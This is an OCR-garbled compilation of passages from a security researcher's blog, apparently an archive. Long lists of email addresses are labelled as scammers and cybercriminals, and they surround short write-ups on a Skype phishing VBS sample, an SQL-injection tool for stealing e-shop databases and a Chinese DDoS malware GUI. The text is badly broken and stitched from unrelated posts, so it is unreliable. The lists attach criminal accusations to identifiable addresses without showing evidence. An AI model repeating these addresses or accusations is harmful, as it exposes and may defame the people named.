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mikybuns66@hotmail.com 
multiwilly@hotmail.com 
derenehinchliff@yahoo.com 
julietbenson200@yahoo.com 
info@us.hom-land.com 
rojdafelatQ9@gmail.com 
rosezamba20@hotmail.com 
info@rediffmail.com 

ca _alexmartin@yahoo.cn 
alexandrualin32@yahoo.com 
maita awori@yahoo.com 
dunkerwendell@outlook.com 
chriswilliam1201@gmail.com 
spamdejieff@live.fr 
florencefinancial@gmail.com 
llucas@tempmail.eu 
cocacolalondonprize@admin.in.th 
e _report@aol.com 

Tesco bankdeptapproved.uk@accountant.com 
jnfstonel01@gmail.com 
gracefulyuliya@yahoo.com 
grahamscottwork@gmail.com 
jexfinancial.investmentitd@yahoo.co.uk 
veralawson@europe.com 
wacfeldmabsant@gmail.com 
sm8250379@gmail.com 
holjeyydsin@gmail.com 
lyudjkoon@yandex.com 

lucas _keller25@yahoo.com 
galbraith884@yahoo.com 
jpoon0622@yahoo.cn 
ruthfelixx@gmail.com 
harry.willson2000@yahoo.com 
svetiana.chistyakova.1983@yandex.com 
S-wantrustloans-uk@citynew.com 
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samuelmensah@virgilio.it 
samuelmensahlive@virgilio.it 
privatemailboxp@gmail.com 
csbnig@gmail.com 
elizavetamysumna@gmail.com 
miguellucas701@yahoo.com 
pwagner240@gmail.com 
jamesksutton@yahoo.com 
adriansbford@hotmail.com 
chefdavidburke@chef.net 
disneyoffice.au@daum.net 
alexandermarkfish@yahoo.com 
verificationcentre.services@accountant.com 
donovan palmer _hamish1945@yahoo.com 
tmichael@bluelmtg.net 
nonearabella@gmail.com 
arabellanone@yahoo.com 
william3452647@gmail.com 
wilfordbilly@msn.com 

sandro _roland@yahoo.com 
payonline verified@fastservice.com 
brayloancompany11@gmail.com 
kelvinjohnson824@gmail.com 
asapleo2@tampabay.rr.com 
dunsolicitors@lawyer.com 
web.office.020.912@att.net 
wilfredlarryO41@gmail.com 
info@zawya-uae.com 
aminatadennisO@gmail.com 
mobiledept@aol.co.uk 
skymohfinancialsl1@gmail.com 
gencampbelljohnson0@gmail.com 
uhbelena@gmail.com 
simon.williams@consultant.com 


Connelly-francespcwins@aol.com 
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mrsalanlester@gmail.com 
jomoesq@yahoo.com 
jeeraddaa.k@gmail.com 
micheal111335@gmail.com 
watsongate@aol.com 
mark707pedro@yahoo.com.hk 
albert.wong03@hotmail.com 
admitri@post.sk 

HSBC _approvedcareline@consultant.com 
collins-evans@live.com 
lituhabla@yandex.com 
den.paul67@yahoo.co.uk 
mrs.coollexrachida@gmail.com 

elise. liana@yahoo.com 

sullivan johnson105@yahoo.com 
Robinson-federalministry15@gmail.com 
sevianmaroon@gmail.com 
frankwaleloancompersation@gmail.com 
enquirycentre@live.com 
ghtirioer@gmail.com 
rossi.marinol7@yahoo.com 
usmanuwafi@gmail.com 
lybimayalady@yandex.ru 
Ken-gracekengkO1@yahoo.com 
disnyjobapplication@anaustralian.com 
boatengboateng20@yahoo.com 
sandra575an@gmail.com 
ecfinancierrss@hispavista.com 
russellgalleyl13@gmail.com 
internationaloxfames@gmail.com 
reliable _financialloan@w.cn 
Famebrown1111@gmail.com 
henrymooreloanfirm@gmail.com 
UPS-Homes-Rentals@consultant.com 
65jooiish27@hairdresser.net 
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williscott61@gmail.com 
romanhop900@hotmail.com 
carollwhitefamily@live.com 
tkazzaz@memphis.edu 
crestshipingline@live.com 
marcosmarco20@yahoo.com 
sokissmiss@gmail.com 
belovksa@gmail.com 
leelan20hk@nihaohong.com 
favouroneil888@yahoo.com 
niimensa@gmail.com 
poplin@vance-brown.com 
simon34dornoo@yahoo.co.jp 
mrspaulinedouglas22@rediffmail.com 
pcole3131@gmail.com 
support@airbnbca.com 
ctbloans@gmail.com 
info@daq-group.com 
chrissantacruz.cs@gmail.com 
service@ubsbank-intl.com 
Lloydsbank.transfer.co.uk@financier.com 
kleinhansO91@gmail.com 
order@Ria-WebShop.de 
theresearchmasters@consultant.com 
unionbankonlinepaymt@aol.com 
fastpayment@mail.com 
nassir1231@outlook.com 
farooqdralimohammad@gmail.com 
jerifettes6551@yahoo.com 
allis@vance-brown.com 
iruemi@outlook.com 
sanusi20@live.com 
qubecone005@yahoo.com 
susanaluv02@gmail.com 


markfred94@yahoo.com 
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tinpiku@mail.goo.ne.jp 
dremelody2010@hotmail.co.uk 
michellejohnson305@gmail.com 
unitedbankofafrica85 7@gmail.com 
liberclark@gmail.com 
usaapartmentsrental@gmail.com 
smithcampbell98@yahoo.com 
aartbar@gmail.com 
miklexyung@yahoo.com 
kathsim8818@gmail.com 
zannet.smith@mail.com 
s.humanitarian@yahoo.com 
Cityfinancialoan@outlook.com 
johnmichael4reak@yahoo.com 
bensonjames200@gmail.com 
kendallhill75@yahoo.com 
toolsforblsting@ericgibsonmghealth.com 
komanb8@gmail.com 
tiffanycardwell424@gmail.com 
Test@grandprixhotel.fr 
rev.fatherdonald _moses@yahoo.com 
benneth.alan@gmail.com 
estherlove756@gmail.com 
mrs.barbaram@gmail.com 
mortgageloan _service@w.cn 
Teresakendallfamily@hotmail.com 
grockew@gmail.com 
sergeantemad.alabbasi@gmail.com 
etcoloanfirmspvtltd@outlook.in 
lorrainehnordby@yahoo.com 

mr _stevenjones8@yahoo.com 
rev.arthurrichard@yahoo.com.ph 
u.n.o@un.org 
informationcenter.office007@gmail.com 
clawjarmila@gmail.com 
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c.louis5 7@gmail.com 


g.design@proflnestco.com 


patricia.hr@upackmovements.com 


grupofinacierointernacional@gmail.com 


frankhancock1971@gmail.com 
konta2@yahoo.com 
qureshi-omar@hotmail.com 
Sebrin2015@hotmail.com 
beakvxk@rotaryconcepts.com 
ezeh2010@mail.mn 
capital-financeltd@outlook.com 
jhnlivin@gmail.com 
ramifamily@blumail.org 
joyomar56@hotmail.com 
lucia23@i.ua 


natalieanderson75@comcast.net 


KEN-eco1921@live.com 
jobsrecruit@careceo.com 
pinktiffanyeric@hotmail.com 
firsrevenueboard@gmail.com 
leadwayfinancialO2@gmail.com 
fedrickharborOl@gmail.com 
mg.notificationpbay@gmail.com 
brokermusayyab@gmail.com 
richardalvinll1@yahoo.com 
robcorb1963@gmail.com 
Bardexoilgas@yahoo.co.uk 
donaldnoah36@yahoo.com 
test@menlh.go.id 
Mere.Laurance@hotmail.com 
htysbty@yahoo.com 
traceann2020@gmail.com 
info@mmandt.com 
craigjjoness@gmail.com 


jakematthew87@yahoo.com 
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laird@bn-builders.com 
stelladokie@gmail.com 
khalid.mainshah@yahoo.com 
sfoster2839@hotmail.com 
nilmario.miranda@mj.gov.br 
mrdavidhoward@outlook.com 
stella26deng@gmail.com 
ubasenegal@aol.com 

stan _awesome@live.com 
frankrivera820@aol.com 
claire@bwibank.com 
foxscott4000@gmail.com 
dextereva2011@aol.com 
rainbowtrustfund01@gmail.com 
job@cheapfabrics.co.uk 
johnkendrick@126.com 
foster.grantza2019@gmail.com 
barristerwilliamsjames1759@gmail.com 
petermichael247@yahoo.com 
mrglenmoore02@gmail.com 
jenniferanderson3000@gmail.com 
jaydenchristopher794@gmail.com 
post.pgamble@siamza.com 
Fosgate-mlamin1926@gmail.com 
eleyna@gmx.com 
fundapprove68@gmail.com 
yuliyanobby@yahoo.com 
sonial4dddd@yahoo.com 
unitedshippingagency@intlcourierservice.com 
ab cde63@yahoo.com 
dr.geraldpalmer@yahoo.com 
chriscole11409@gmail.com 
pintoricardo@outlook.fr 
dannisharelloanlender@yandex.com 
zoeangelphillips79@gmail.com 
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Scanners result : Result: 3/31 (9.68 %) 
VBS/Small.W.1; Exploit-MS06-014 


File size : 13569 bytes 


MD5 ...: 4d6a559adf0602f7fd58b884e00894dc 


SHA1 ..: 056f75e0dd94d03daeb04ae83d1b4a1b7476c0f2 


SHA256 : 3f08427228489edffd57e927db571aea06716c192ec72f91ea8115c0c7f978eb 


ie 


The phishing page wasn’t created, but copied from Skype’s original login page. The phisher 
even left an email within the VBS, in this case - ikbaman@gmail.com. Virtual greed or contact 
point optimization for fraudulent purposes, passive phishing attacks can sometimes be quite 
active and leave the curious clicker with a false feeling of security. 


1. http: //ddanchev. blogspot .com/2007/12/phishers- spammers-and-malware-authors.htm 
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fc074871nig.org@gmail.com 
mrslambert432@gmail.com 
bar.frankdaniel@aliyun.com 
sistermaryannj@hotmail.com 
adaraamani@hotmail.com 
kurtmark31@gmail.com 
cs054232@gmail.com 
liloyal89@gmail.com 
staceymomma39@gmail.com 
marksolomo3@gmail.com 
kraizybee@yahoo.com 
sandirose220@gmail.com 
shawnalorita@yahoo.com 
directionciccanada@list.ru 
passyhome001@gmail.com 
hassababy1@att.net 
rentalflats@rocketmail.com 
sales@epislimited.com 
gtfundsO07@yahoo.com 

offi. money86@blumail.org 
efcc27800perate@gmail.com 
carlospedro400@yahoo.com 
markhopkinsconsult@gmail.com 
marcvilliers81@gmail.com 
info@yahoo.co.uk 
gatesfoundation146@outlook.com 
methanyt@yahoo.com 
vakkenoli@yandex.com 

nina _gilbert@msn.com 
mrmohammedabachal1997@yahoo.com.hk 
activationatmcard@outlook.com 
AndrewAlessio32@yahoo.com 
hrdepartmentincanada@outlook.com 
contact@oceanmortgagesuk.net 


ragland kay@aol.com 
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mark.ottil00@gmail.com 
aro.suit@aol.com 
ftxldt@hushmail.com 
micheleshawcooperatefirm@yahoo.com 
ryunnyhus@yahoo.com 
brilliantmind30@gmail.com 
rosemarysekey10@gmail.com 
greaterlove2011@gmail.com 
cindygrace410@gmail.com 
info@merrilynchcn.com 

m __shopper@aol.com 
johnsonwilliams1769@gmail.com 
watsonwentworth@yahoo.co.uk 
collinspowelll8@yahoo.com 
kennedy.uzoka@uba-africa.com 
info@maxglogistics.com 
christloanfirml1@gmail.com 

lears a@yahoo.com 

info oceanicbakpl|@oceanicbk.com 
richardmicheal888@gmail.com 
waliyasalim12@hotmail.com 
skyfinance.firm@live.com 
annwalker879@gmail.com 
unitednationpayout@hotmail.com 
carlsandyman@yahoo.com 
nadenefetterse@gmail.com 
halifaxbklondon@accountant.com 
missanitagueil@rocketmail.com 
backofenm@yahoo.com.hk 
beruz.jakel@gmx.com 
airobnbexpress@tech-center.com 
wmwesternunionmoneytransfer84@gmail.com 
drmarkoliseh@yahoo.com.ph 
lisameghan@rediffmail.com 
tdo491624@gmail.com 
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usarelieffunds@gmail.com 
elenn.sun@yandex.com 
cathl7003@gmail.com 
olusegunaganga3210@gmail.com 
tomlambert2012@aol.com 
jeffcoleman688@yahoo.com 
office.airbnb@europe.com 
favo6790ruben@yaMeetzurhoo.com 
adamsali33@voila.fr 
berthamacripo@yahoo.co.uk 
michaelcollies@yahoo.com 

bar _bchristopher@hotmail.com 
kar20soe20@gmail.com 
mystery@dexter-tech.com 
jamesalloy26@yahoo.com 
tescemasjeehhjsyrstyus@opentechgr.com.br 
drtedros.adham@gmail.com 
f.david62@hotmail.com 
dominikhubert3@gmail.com 
addisonbrown43@yahoo.com 
nasserkhalilaljaidah90@gmail.com 
miss.sidiki72@yahoo.fr 
azimdirira@gmail.com 
jouhnamed@yahoo.com 
johnow1208@yeah.net 
sarahkotey187@gmail.com 

pay _online@fastservice.com 
mrshudaalghoson101@gmail.com 
clarajames@yahoo.cn 
margarethenry1919@gmail.com 
henrybistrow@yahoo.com 
contact@rentsafe.eu 
jessicalauren859@gmail.com 
wuwiretransfer@consultant.com 


alicia.gerpper@gmail.com 
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chiwailouissO@yahoo.com.hk 
lauren _fernandez17@yahoo.com 
massingalebryan@att.net 
greg4love111@yahoo.com 
ceo.azimhashimpremji@gmail.com 
infoas860@gmail.com 
kasO8p@gmail.com 
sgttheresa2@gmail.com 

jone _larry@yahoo.com 

evylen a@hotmail.com 
nisreenman3@msn.com 
alenaf@hapimag-binz.de 
OnlineShopGMBH@FastMail.de 
greatmanofvalour@comcast.net 
greenland _finance@aol.com 
woronkowicz11@gmail.com 
obriananderson24@yahoo.com 
favour bless@hotmail.com 
web.offic.0.0.18@sbcglobal.net 
cocacola_draw2012@ozledim.net 
mackin.d@aol.com 
raphg50@yahoo.com 
mrjcarlos1210@gmail.com 
colewesson@airsoftmail.com 
cythiniamoore@gmail.com 
kellymadsion9@gmail.com 
jamiedimon61@hotmail.com 
frode64hvaring@gmail.com 
appiah59@rediffmail.com 
wallexgeorge@gmail.com 
robinsonewelem61ts@outlook.com 
elizabethcoleman@merckopolis.com 
belusm5@yahoo.co.jp 
cyber.crimebureau@ymail.com 
support@order-payment-amazon.com 
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wabdul-shakur@mail.com 
iraqimission@mail.kz 
dave.nunez@aol.com 
mariamurphy13@gmail.com 
royalbank _ofca@aol.com 
Marylyne-marylynevantelli20@gmail.com 
bryanjohnson@9.cn 
maxwellkate88@hotmail.com 
cbnkofnigeria@gmail.com 
natwestbank _int.transferservices@accountant.com 
us-exit-mil@post.com 
harrisfamily@aupaircom.tk 
info@naynord.com 
romepetrine@yahoo.com 
el0090ffice@att.net 
tnt-holdings@europe.com 
liviofiore@yahoo.it 
honcharlesflanagantdf@gmail.com 
robertcomes45@yahoo.com 
stevewilliams1203@hotmail.com 
bankonlinemail@gmail.com 
ksenyhoms@gmail.com 
gracelovefirst@yahoo.com 
drphilipedoziel2@gmail.com 
info@thrifty.com 
xwd475@chiadc.com 

mrmichael _bakerl@hotmail.com 
td home@aol.com 
roserjosephp22@gmail.com 
iphonemaillingapps@aol.com 
godsentloanservicel@gmail.com 
flroal214@msn.com 
gw865000@gmail.com 
championfrenchiesO@gmail.com 


peterainsworth35@gmail.com 
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emilashell.kp _hrdesk@aol.com 
kudradilla@gmail.com 
lardonmahtieu@outlook.com 
melissa _griffiths@ymail.com 
james.milla@aol.com 
walterwright225@hotmail.com 
jesulobaatiolugbalahome@gmail.com 
directfinancemgt@hotmail.com 
currencycapital@csgtsteelhk.com 
joannacolesarmy77@gmail.com 
benner@fillmore-construction.com 
infoaliexpress@yahoo.co.jp 
anteliant@googlemail.com 
giuliano.meruni71@gmail.com 
blessingstenant@yahoo.com 
us926584@gmail.com 
verificationtransfer@europe.com 
paulahamilton10@live.com 
lesliandree21@gmail.com 
stellacollinsO33@gmail.com 
purchase@animalvetproducts.com 
jtc34ckck@yahoo.co.jp 
andrearavelli2002@outlook.com 
hardlarkane@yahoo.com 
mpatricia44@outlook.com 
giancarloiroddi20l10@yahoo.com.hk 
screening@exetermedical.hst.im 
screening.exetermc@gmail.co 
c_rental@netzero.net 
martgianna@outlook.com 
setorl11@abelharainha.com.br 
commercialista@commercial-ista.com 
eng.larryl1l1@yahoo.com 

tescobank _online-banking@fastservice.com 
evan _cole@yahoo.com 
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barings.wealthmanagement@yahoo.com 
jaya@link3.net 
elizabethallenety@gmail.com 
oluchkaolg@gmail.com 
glotradebizenterprises@live.co.uk 
thegoodman005@yahoo.com 
rennie@weeks-marine.com 
gavinfedro931@yahoo.com 
gaddafi.aisha71@yahoo.fr 
mathewwang06@gmail.com 
paul201232@hotmail.com 
thomaspope678@gmail.com 
radmoredebbie@yahoo.com 
info@rehapmed.com 
maryquayek57@gmail.com 
arnoldcheinrich@gmail.com 
atmcardpaycent56@att.net 
ttima63@yahoo.com 
western96union@gmail.com 
bobhenry3377@yahoo.com 
goldfieldghitd233@gmail.com 
michealteawire@yahoo.com 
lora.kent@yahoo.com 
mktngt@mail.goo.ne.jp 
kongedward3@live.com 
chiboyman@yahoo.fr 
ecowaswamaafrica@gmail.com 
newproduct2017@gmail.com 
missroseali0l00@hotmail.fr 
larrymathewO@gmail.com 
spendylove880@gmail.com 
dolphsteve300@gmail.com 
bruce.schubert99@yahoo.com 
Stay tuned! 


1. https://1.bp.blogspot.com/-BsKTtErY380/YFXNHV310VI/AAAAAAAAL- 0/HOm3w3gd5nwR_I2q_newN_G2JxuMv2GDQCLcBGAsYHQ 
s500/Misc_01.JP 
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17.3.12 Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 
Addresses - Part Nine (2021-03-20 12:53) 


Pat )DUnP's sHoP wi 


Dear blog readers, 


I’ve decided to share yet another batch of currently active email address accounts belonging to 
high-profile cybercriminals that are currently active part of the "[1]Exposing a Currently Active 
Portfolio of High-Profile Cybercriminal Email Addresses" series with the idea to assist U.S Law 
Enforcement including the U.S Intelligence Community on its way to track down and prosecute 
the cybercriminals behind these campaigns. 


Sample personal emails belonging to high-profile cybercriminals that are currently active and 
are known to have participated in related fraudulent and malicious campaigns include: 


approved0Ocode@exploit.im 
blade _runner@1jabber.com 
gozoomgo@Onlline.at 
monah@jabb.im 
yashimura@exploit.im 
muna69@xmpp.jp 
stariymen@xmpp.jp 
burnerry@xmpp.jp 
gluckonn@xmpp.jp 
smerdyukov@jabme.de 
stevevai@xmpp.jp 
fridrixns@exploit.im 
keny809@jabber.org 
jonimnemonick@jabster. pl 
jonimnemonick@sj.ms 
satoshik@jabbim.com 
naliubanki@chatme.im 
grad@exploit.im 
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dontaskmewhypro@gmail.com 
codeprasya@exploit.im 
junior ferrari@jabber.ru 
dastik99@yax.im 
100820@jabber.ru 
accord5k@exploit.im 
cousinavi@exploit.im 
aplexpetrov@mail.ru 
pandoral2@xmpp.jp 
pharaon@xabber.org 
panama@jabber.dk 
soft-rdp@xmpp.jp 
billsmith63@xmpp.jp 
pikachoo@exploit.im 
whitedl@sigaintevyh2rzvw.onion 
jupez2911@gmail.com 
rfak@xmpp.jp 
adamtaylorab@xmpp.jp 
bigbro@zloy.im 
kirkstall@xmpp.jp 
shipment@zloy.im 
aCCman@roteshield.ru 
fullofhate@exploit.im 
sayto@exploit.im 
curto.aee. L_@hotmail.co.uk 
bshaduli@emirates.net.ae 
brenda.aguirre@timco.aero 
anderson _@vista.aero 
r3kruter@exploit.im 
2tracks@jabber.se 
555666@jappix.com 
ladybin@xmpp.jp 
tommystaggs@hotmail.com 
togradyO920@msn.com 


stutesa@wbu.edu 
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fokan4k33@jabbim.pl 
grekk@dukgo.com 
hounter@jabme.de 
armaniboss@jabbim.cz 
a4vision@xmpp.dk 
bilzerian _admin@jabbim.sk 
terrychan@dslextreme.com 
semuel7@exploit.im 
smtpsrvs@exploit.im 
meuccisheyh@exploit.im 
netcasha@yahoo.com 
starowar@protomail.com 
Psichologist@Jabber.ru 
saturn.ge@xmpp.jp 

panov _19@inbox.ru 
mario7777@jodo.im 
Danfer@exploit.im 
shelley@chatme.im 
maliken@jabber.ccc.de 
manofwar32@xmpp.jp 
coolduglasde@gmail.com 
perchikdimon@mail.ru 
Msmmoth2552@gmail.com 
dropkv93@gmail.com 
shomaekx2013@yandex.ru 
sergej.sergeipetrov@inbos.ru 
dj.kann@yandex.ru 
mishka08@jabber.ru 
100btc-exchange@exploit.im 
Hadess1290@jabber.ru 
xoxoxol@exploit.im 
Richland@jabb.im 
inlog@dukgo.com 
vision777@xmpp.jp 
bzman@exploit.im 
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4.5.9 Stealing Sensitive Databases Online - the SQL Style (2008-05-12 08:13) 


UPL ls 


Tables : Fields 
REFERENTIAL_CONSTRAINTS a C_addess 
accounts sto IP_ADDRESS 

C BER ORDER_DATE: Oct 4 2007 12004M 


ID; 1030326833 


SHIP_ZIP 
vendors COMMENTS 
CHECK_CONSTRAINTS me 


COLUMN_DOMAIN_USAGE IP_CITY C_company 
COLUMN_ PRIVILEGES P_STATE C_addets. :. 
COLUMNS SHIP_COUNTRY IP_ADORESS: . 

CONSTRAINT_COLUMN_USAGE SHIP_COMPANY ORDER_DATE: Oct 1 2007 12004M 

CONSTRAINT _TABLE_USAGE SHIP_ADDRESS1 

DOMAIN_ CONSTRAINTS P_ADDRESS2 

DOMAINS SHIPPING ID ¥ _ Descerning 


Extract Tables | Extract Fields 


s o on 
Server Informatior Save 


Vetsioer Mictosolt SOL Server 7.00 - 7.00.1063 [Intel X85) “Age 9 2002 14:18:16 ™ Coppngtt (c] 1988-2002 Microsolt Corporation 
Entermrise Edition on Windows NT 5.0 (Build 215%: Service Pack 4] Retrieve Server Info 


Server Name SERVER Timeout 10 
Databare: =z Retty Timeout 45 


User Retnes 3 


In a perfect world from a malicious SQL-ers perspective, mom and pop E-shops filling market 
niches and generating modest but noticeable revenue streams, have their E-shops vulnerable 
and exploitable to web application vulnerabilities, with their [1]SQL databases available for 
extraction in an unencrypted form. 


In reality, reconnaissance through search engine’s indexes to build a hit list of E-shops 
with a higher probability for exploitation, is what malicious attackers who lack the skills and 
capacity to build a botnet, even invest money into renting one on demand and collecting the 
output in the form of credit cards numbers and accounting data, have been doing for the past 
of couple of years. Moreover, as I’ve already pointed out and provided relevant examples, 
it’s perhaps even more disturbing to see [2]the automated process of building such hitlists, 
verifying that they’re exploitable, remotely exploiting them by embedding malicious links 
within their pages, and of this made possible through the use of botnets. 


The whole is greater than the sum of its parts, and while some are putting time and ef- 
forts into figuring out whether or not a specific vulnerability is exploited, and through the 
use of which hundreds of thousands web sites again end up injected with automatically 
loading links to malicious domains, the bad guys are keeping it simple, sometimes way too 
simple to end up with the most successful and efficient ways to achieve their objectives. 
Furthermore, [3]waging verbal warfare on whether or not [4]XSS are a greater security risk 
than currently perceived, is definitely making a lot of malicious attackers out there enjoy the 
lack of situational awareness of those who are supposed to have a better grasp of what they’re 
up to, not what they might be up to. 


The bottom line - from a malicious economies of scale perspective, are [5]massive SQL 
injections attacks serving malware to a speculated number of hundreds of thousands [6]sus- 
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ceptible to clien-side attacks exploitation site visitors, more effective, than obtaining the 
low-hanging databases in a site-specific vulnerability manner? Depends entirely on what the 
bad guys are trying to obtain, access to as many infected hosts as possible to be later on used 
for phishing, soamming, stepping stones, hosting and distribution of malware and conducting 
OSINT for corporate espionage by segmenting the infected population into organizations of 
importance, or access to "the whole" benefits package coming with having a complete access 
over an Internet connected host. 


. http: //www.evilsql .com/main/page2. php 


. http: //ddanchev. blogspot .com/2007/07/sql-injection-through-search-engines.htm 


. http://www. theregister.co.uk/2008/04/29/mcafee_hacker_safe_sites_vulnerable/ 


1 
2 
3 
4. http://jeremiahgrossman. blogspot. com/2008/01/scanalert-xss-is-not-our-problem. htm 
5 
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. http: //ddanchev. blogspot .com/2008/04/united-nations-serving-malware.htm 


. http: //ddanchev. blogspot .com/2008/03/massive-iframe-seo-poisoning-attack.htm 


4.5.10 Custom DDoS Attacks Within Popular Malware Diversifying (2008-05-12 11:42) 


ca = x | 
File(®) Functions) About &) 
=“ ce ry) ~~ 9 ka 8 Oo 
Online fk DDoS Update IP Setting Build Server HomePage Exit 
Common Attack: WEB Attack: Speical Attack: Combine Attack: Attack For Korean: 
[D1JSYN Flood [02}ICMP Flood [O7JNoCache Get Flood [10)CQ Game Attack  [13]SYN+UDP Flood [16}Korean Game Attack 
[O3JUDP Food [04]UDP Small Size [O8}CC Attack [11]Route Attack [14)CMP+TCP Flood [17]Korean Wager Attack 
[O5]TCP Flood [06]TCP Muk-Connect [OSJHTTP GET Nothing [12]Smart Auto Attack [15)UDP+TCP Connect [18}anti-WebKnight Attack 
Use Selected PCs 
Target: http://www target.com/show.asp7id=123 Port: 80 
AMtack Type: |08 ~| Thread: 10 (< PC Num: Selected PCs (anack—] 
Auto Select PCs 
Type:|03 ~| Thread: 10 <= Num: 100 [2 Target: wwwtarget1.com Port: 80 Attack 
Type:/03 | Thread: 10 §2) Num: 100 §2| Target: wwwtarget2.com Port: 80 Attack 
Type:|03 + | Thread: 10 = Num: 100 = Target: www target3.com Post: 80 Attack 
Type:|03 ~| Thread: 10 2 Num: 100 [2! Target: wiwtarget4.com Port: 80 Attack | 
Type:|03 ~| Thread: 10 <= Num: 100 |) Target: wwwtarget5.com Port: 80 Attack | 
Type:|03 ~| Thread: 10 |S) Num: 100 (2) Target: wwwtarget6.com Port: 80 Attack 
Target should be IP.DNS,and Webpage Ur Only CC Attack need url as target. <<<<Succed to send 0 [stop] commands 2 
IP Example: 202.199.24.35 >>>>Succed to send 0 [attack] commands 
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One of the many Chinese script kiddies’ favorite malware tools has been recently [1]updated 
with several other DDoS attack capabilities built within, as well as with a nasty bandwidth 
allocation and measurement option introduced within. In case you remember, this was the 
very same malware tool | used as an example of how [2]open source malware is prone to 
extend its lifecycle, and enjoy unique functionalities added on behalf of third-party contributors 
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ladybin@exploit.im 
gohatrade@exploit.im 
loneljulik@bigmir.net 
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toma200505@mail.ru 
kosmopolit@korovka.pro 
Gonkong@jabbim.cz 
money666@xmpp.jp 
jenfralick@yahoo.com 
thegardners@iname.com 
frontlinecorp@eth.net 
ancio66@teletu. it 
tutto204@hotmail.it 
dani26183@live.it 
dani261983@Qlive.it 
mari.sofia@alice.it 
magicmario 86@hotmail.it 
dolce.garino@gmail.com 
elgatonegro2009@hotmail.it 
francosimone11@virgilio.it 
xshamanx@default.rs 
marcus@cerberus.la 
6999666@exploit.im 
jayzee3216@procrd.pro 
lutch5@explolt.im 
lutch5@exploit.im 
elvi@exploit.im 
automated@airbnb.com 
mister xxx@exploit.im 
gun-jack@xmpp.name 
abcstore support@exploit.im 
gelenvagen2015@default.rs 
gelik@monopoly.cc 
weter@prv.name 
rasty7@xmpp.jp 
jozzzy474@exploit.im 
alexmarcenary@jabbka.ru 
stalk777@xmpp.jp 
book@darkdna.net 
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name03@exploit.im 
kefman@default.rs 
qwertycat@exploit.im 
goldman@jabbim.com 
oracul@exploit.im 
teror999@jabster.pl 
oracul@prv.name 
LangloisLlance80@gmail.com 
happynation@default.rs 
nord887@exploit.im 
darksy@xmpp.jp 

alisa black@sj.ms 
herme7@sj.ms 
herme7@draugr.de 
ensi@Onl1ne.cc 
entropia@exploit.im 
524362@jabbim.com 
timon@topsec.in 
crost@exploit.im 
sellmen@sj.ms 
sellmen@xmpp.jp 
m.issahka0110@gmail.com 
zlulu@xmpp.name 
scarface@exploit.im 
scarface@default.rs 
j.johnson@jabb3r.de 
lashawn.patterson@ymail.com 
aleighadavis1223@gmail.com 
dserio@accesscommunity.org 
bugdan66@xabber.org 
gerceg@creep.im 
grens@xmpp.jp 
grens@exploit.im 
cm@exploit.im 

limon@prv.st 
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to the open source project. 


The ongoing development of the tool showcases several important key points, namely, 
how a market share leader’s products in a certain region, Korea in this case, often receive 
the attention of malware authors embedding product-specific DoS attacks within, and also, 
the fact that [3]the average script kiddies are continuing getting empowered with access 
to DDoS tools going beyond the average HTTP request flooders and ICMP flooding attacks. 
Furthermore, realizing the PSYOPs effect that could be created out of the popularity of this DIY 
malware, a specific Anti CNN version was released during the [4]Anti CNN attack campaigns, 
and as you can also see, ABC.com is hard coded as an example of a site to be attacked. 
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From an unrestricted warfare perspective, what is the difference between someone who has on 
purposely infected themselves with malware to appear as an infected hosts in this malware’s 
C &C, and when traced back as a participant in the DDoS attacks simply states she’s been 
infected with malware, next to those infected hosts who were unknowingly participating in the 
DDoS attacks? There wouldn't be any. 


. http://ddanchev. blogspot .com/2007/09/custom-ddos- capabilities-within-malware.htm 


1 

2. http: //ddanchev. blogspot .com/2007/09/localizing-open-source-malware.htm 
3. http: //ddanchev. blogspot . com/2007/10/empowering-script-kiddies .htm 

4. http://ddanchev. blogspot . com/2008/04/ddos-attack-against-cnncom. htm 
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bonjure@exploit.im 
hipservice@deshalbfrei.org 
irondimon@jabber.ru 
Futurist@draugr.de 
uas-admin@sj.ms 
rdp777@zloy.im 
rdp777@darknet.im 
hissatsu@swissjabber.ch 
sector123@exploit.im 
winline9369-discovery-wwh@zloy.im 
born@neko.im 

S@jabber.cz 
norv@draugr.de 
otelideshevo@online.ee 
canada7@jabbim.com 
grmxbot@sj.ms 
surefly@sj.ms 

Stay tuned! 


1. https: //ddanchev. blogspot .com/2021/03/exposing-currently-active-portfolio-of_20.htm 


17.3.13 Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 
Addresses - Part Ten (2021-03-20 17:12) 


—— 
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[1] 
Dear blog readers, 


Continuing the "[2]Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 
Addresses" blog post series I’ve decided to share yet another batch of currently active high- 
profile cybercriminal email address accounts with the idea to assist U.S Law Enforcement and 
the U.S Intelligence Community on its way to track down and prosecute the cybercriminals 
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behind these campaigns. 


Sample portfolio of currently active personal email address accounts belonging to high-profile 
cybercriminals that are currently active include: 


komrakoff support@exploit.im 
komrakoff.supp@gmail.com 
mnufahja@xmpp.ru.net 
xls@xmpp.jp 
Jabber-1Insider@xmpp.jp 
moneymaker@mpro.la 
kinkeyd@protonmail.com 
fullzinfo@exploit.im 
cmpss@exploit.im 
feniks-play@exploit.im 
fortoviy@default.rs 
LoveJoy@exploit.im 
deepdish@jabster.pl 
cassel@exploit.im 
red-bul@exploit.im 
comediant@jabber.dk 
Abrrellian@bdf.asia 
abrrellian@jabbim.cz 
acctnrouting@jabb.im 
Kellies3baskets@yahoo.com 
topsellbases@exploit.im 
grach@xmpp.cx 
diveragent@exploit.im 
buypower@exploit.im 
deadp0ol@exploit.im 
allsafe@exploit.im 
allsafepro@exploit.im 
zill30@default.rs 
cpt.shepard@default.rs 
romochka.volkov.91@inbox.ru 
maestro bot@thesecure.biz 
canadafee@jabber.cz 
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ohmtouchlala@xmpp.jp 
mazafaka1983@exploit.im 
vodem@tutanota.com 
FSeller@exploit.im 
selfie-proof@yandex.ru 
lebowski@jabbim.ru 
creto567e@xmpp.si 
detalist@xmpp.jp 
help@detalist.info 
selfiZ020@jabbim.ru 
Financial.king@mail.ru 
Mehdih.finance@gmail.com 
needjob@exploit.im 
maryjjfelix@mail.bg 
picasso73@thesecure.biz 
igortoprol@mail.ru 
eurofield@exploit.im 
az@jabber.fm 
montana@topsec.in 
sup2@zloy.im 
eurofield@qip.ru 
Docspaint@xmpp.jp 
brooks.mrs@yandex.ru 
docspaint@xpmm.jp 
alonart@xmpp.jp 
alonartl2@gmail.com 
Cleanrdps@exploit.im 
brabos@exploit.im 
maza-in@exploit.im 
maza-in@thesecure.biz 
maza-in1l@thesecure.biz 
mkiller@exploit.im 
tungsten@sj.ms 
tungsten@thesecure.biz 


codeprasya@exploit.im 
